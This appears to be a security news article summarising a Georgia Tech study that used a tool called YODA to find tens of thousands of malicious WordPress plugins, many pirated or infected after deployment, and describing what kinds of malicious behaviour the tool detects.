As many as 47,337 malicious plugins were discovered on 24,931 unique websites, of which 3,685 plugins were sold on legitimate marketplaces, earning attackers $41,500 in illegal revenue.
The findings come from a new tool called YODA that aims to detect malicious WordPress plugins and trace their origin, according to an 8-year study by a group of researchers from the Georgia Institute of Technology.
“Attackers posed as benign plugin authors and spread malware by distributing pirated plugins,” the researchers said in a new paper titled “Beware of Plugins You Need.”
“The number of malicious plugins on websites has steadily increased over the years, and malicious activity peaked in March 2020. Amazingly, 94% of malicious plugins installed over those 8 years are still active today.”
The large-scale research analyzed WordPress plugins installed on 410,122 unique web servers dating back to 2012, finding that plugins that cost a total of $834,000 were infected post-deployment by threat actors.
YODA can be integrated directly into a website and web server hosting provider, or deployed through a plug-in marketplace. In addition to detecting hidden and faked malware add-ons, the framework can also be used to identify a plugin’s provenance and ownership.
It does this by scanning server-side code files and associated metadata (e.g., comments) to detect plugins, and then performs syntactic and semantic analysis to flag malicious behavior.
The semantic model represents a wide range of red flags, including web shells, the function of inserting new messages, password-protected execution of injected code, spam, code obfuscation, blocking of SEO, malware downloaders, malicious advertising and cryptocurrency miners.
Some of the other notable findings are as follows –
- 3,452 plugins available on legit plugin marketplaces made it easy to inject spam
- 40,533 plugins infected after deployment to 18,034 websites
- Null plugins – WordPress plugins or themes that have been tampered with to upload malicious code to servers – accounted for 8,525 of the total malicious add-ons, with around 75% of pirated plugins tricking developers out of $228,000 in revenue
“By using YODA, website owners and hosting providers can identify malicious plugins on the web server; plugin developers and marketplaces can check their plugins before distribution,” the researchers pointed out.